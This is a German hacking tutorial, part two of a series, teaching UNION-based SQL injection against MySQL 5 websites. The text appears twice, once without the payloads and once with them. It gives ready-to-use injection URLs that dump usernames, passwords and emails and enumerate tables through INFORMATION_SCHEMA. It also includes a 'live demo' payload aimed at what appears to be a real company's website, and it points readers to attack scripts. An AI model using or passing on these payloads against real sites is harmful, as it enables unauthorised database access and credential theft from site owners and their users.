Heyho,
Im 2. Teil meines Tutorials wird sich alles mehr auf MySQL v5 beziehen.
Noch ein paar Nachträge zum ersten Teil:
Zum Punkt ausgeben, mit concat(username,0x3a,password) lohnt es sich ab Ausgaben von 3 oder mehr Columns, also zum Beispiel noch eMail, die Funktion concat_ws() zu benutzten. Das sieht dann so aus:
Vorraussetzung ist, dass der Column eMail auch existiert.
Die Ausgabe sieht dann so aus:
Da es noch was wegen dem “and” gab.
Das and 1 = 0 fragt hier ob 1 = 0 ist. Da 1 != 0 ist, ist das also Falsch (false) und daher sollte wenn etwas vuln ist, auf der Page inhaltlich etwas fehlen oder eben auch nen error erscheinen.
Sollte die Page normal anzeigen, da 1=1 ist, und logisch auch richtig ist. Das “sagt” dann so viel wie “Zeige id=5 wenn 1=1 ist”. Daher sollte hier der Inhalt richtig angezeigt werden.
So nun zum eigentlichen Tutorial, wenn wir nun die Anzahl der Columns mit Order By rausbekommen haben, UNION SELECT 1,version(),3 funktioniert und wir dort Version 5.0.45-community oder 5.x.x rausbekommen, dann haben wir im Normalfall auch Zugriff auf die Datenbank INFORMATION_SCHEMA. Mehr dazu hier: *klick* (die MySQL Documentation kann oft hilfreich sein). Im Normallfall werden dort quasi alle Tabellen/Columns gespeichert, welche sich auf der DB befinden. Dies ist ein extremer Vorteil, den so koennen wir uns alle Datenbanken, Tabellen und Spalten ausgeben lassen. Vorallem gibts fuer v5 auch einige gute Scripts, welche einem die ganzen DB/Tables/Columns rausschreibt.
Ich gebe mir das mit conat_ws aus. Wir wollen uns nun ausgeben: DATENBANK:TABELLE:SPALTE
Das ganze muessen wir so gestalten:
Bis ~ 180 kommen tabellen von INFORMATION_SCHEMA welche uninteressant sind, ab ~ Limit 180 werden uns die Daten von anderen DBs ausgegeben, welche dann fuer uns auch interessant sind. Zuerst zum LIMIT, was bewirkt das? Das LIMIT wählt den Datensabsatz/Reihe aus, welche ausgelesen werden soll. 0,1 bzw 1,1 waere der erste Datensatz, 2,1 wäre der Zweite usw..
Nun wird uns ausgegeben:
Wichtig: Ihr müsst beachten, wenn sich mehrere Datenbanken auf dem Server befinden, muessen wir die richtige DB im FROM Statement mit einem Punkt auswählen. Das heißt, wenn die DB lol heißt und die Tabelle users dann sieht das so aus:
Daher haben wir hier auch INFROMATION_SCHEMA.COLUMNS genommen, da in der Tabelle Columns man DB name, tabellen name und column name auslesen kann, ist manchmal sehr wichtig.
Dann gehen wir das Limit durch, wenn ihr nun irgendwann bei webuser:users:username bei LIMIT 301,1 und bei 302,1 webuser:users:password steht (db name is frei erfunden), dann wissen wir nun “aha die DB heißt webuser, die Tabelle heißt users und die Spalten sind username und password”. Koennt auch noch 303,1 machen usw.. irgendwann erscheint ein error (oder eine weiße seite) und dann wisst ihr, dass ihr am Ende seid und nicht weitere Tabellen mehr existieren. Ist natürlich totaler Schwachsinn das immer eins aufzuzählen, ich mach das in 50er-Schritten. Wie gesagt, Scripts können hier helfen, darkc0de hat tolle Python scripts. Ansonsten einfach in Schritten weiter machen, ob ihr irgendeine tabelle mit users oder admins oder ähnliches seht und dann dort eben in 1er schritten weiter.
Wenn wir nun unsere Daten haben, machen wir wie bei Teil 1 weiter:
Aufjedenfall hilft, wie ihr seht, MySQL version 5.x.x um einiges weiter, da wir hier nicht Tabellen Namen irgendwie erraten muessen
Das war nun Teil 2 von meiner Tutorial Reihe, der kürzeste Teil, da man zu Version 5 nicht viel erzählen kann.
Hier noch schnell eine Livedemo:
Aufjedenfall hoffe ich, dass ihr dieses Tutorial mehr oder weniger verstanden habt und es vorallem Neulingen bzw Anfängern geholfen hat.
Teil 3 über Blind SQL Injections wird bald folgen, schon fast alles fertig!
~fred
Im 2. Teil meines Tutorials wird sich alles mehr auf MySQL v5 beziehen.
Noch ein paar Nachträge zum ersten Teil:
Zum Punkt ausgeben, mit concat(username,0x3a,password) lohnt es sich ab Ausgaben von 3 oder mehr Columns, also zum Beispiel noch eMail, die Funktion concat_ws() zu benutzten. Das sieht dann so aus:
http://www.site.de/news.php?id=-5 /**/UNION/**/SELECT/**/1,concat_ws(0x3a,username,password,email),3/**/FROM/**/users/*
Die Ausgabe sieht dann so aus:
Username:Password:eMail
http://www.site.de/news.php?id=5 and 1 = 0
http://www.site.de/news.php?id=5 and 1 = 1
So nun zum eigentlichen Tutorial, wenn wir nun die Anzahl der Columns mit Order By rausbekommen haben, UNION SELECT 1,version(),3 funktioniert und wir dort Version 5.0.45-community oder 5.x.x rausbekommen, dann haben wir im Normalfall auch Zugriff auf die Datenbank INFORMATION_SCHEMA. Mehr dazu hier: *klick* (die MySQL Documentation kann oft hilfreich sein). Im Normallfall werden dort quasi alle Tabellen/Columns gespeichert, welche sich auf der DB befinden. Dies ist ein extremer Vorteil, den so koennen wir uns alle Datenbanken, Tabellen und Spalten ausgeben lassen. Vorallem gibts fuer v5 auch einige gute Scripts, welche einem die ganzen DB/Tables/Columns rausschreibt.
Ich gebe mir das mit conat_ws aus. Wir wollen uns nun ausgeben: DATENBANK:TABELLE:SPALTE
Das ganze muessen wir so gestalten:
http://www.site.de/news.php?id=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,table_schema,table_name,column_name),3/**/FROM/**/INFORMATION_SCHEMA.COLUMNS/**/LIMIT/**/180,1/*
Nun wird uns ausgegeben:
Datenbankname:tabellenname:spaltenname
... FROM lol.users...
Dann gehen wir das Limit durch, wenn ihr nun irgendwann bei webuser:users:username bei LIMIT 301,1 und bei 302,1 webuser:users:password steht (db name is frei erfunden), dann wissen wir nun “aha die DB heißt webuser, die Tabelle heißt users und die Spalten sind username und password”. Koennt auch noch 303,1 machen usw.. irgendwann erscheint ein error (oder eine weiße seite) und dann wisst ihr, dass ihr am Ende seid und nicht weitere Tabellen mehr existieren. Ist natürlich totaler Schwachsinn das immer eins aufzuzählen, ich mach das in 50er-Schritten. Wie gesagt, Scripts können hier helfen, darkc0de hat tolle Python scripts. Ansonsten einfach in Schritten weiter machen, ob ihr irgendeine tabelle mit users oder admins oder ähnliches seht und dann dort eben in 1er schritten weiter.
Wenn wir nun unsere Daten haben, machen wir wie bei Teil 1 weiter:
http://www.site.de/news.php?id=-5 /**/UNION/**/SELECT/**/1,concat(username,0x3a,password),3/**/FROM/**/users/*
Das war nun Teil 2 von meiner Tutorial Reihe, der kürzeste Teil, da man zu Version 5 nicht viel erzählen kann.
Hier noch schnell eine Livedemo:
http://www.sbcommunicationsgroup.com/media-info.php?id=-1/**/UNION/**/SELECT/**/1,2,3,concat_ws(0x3a,table_schema,table_name,column_name)/**/FROM/**/INFORMATION_SCHEMA.COLUMNS/**/LIMIT/**/180,1/*
Teil 3 über Blind SQL Injections wird bald folgen, schon fast alles fertig!
~fred
Keine Kommentare:
Kommentar veröffentlichen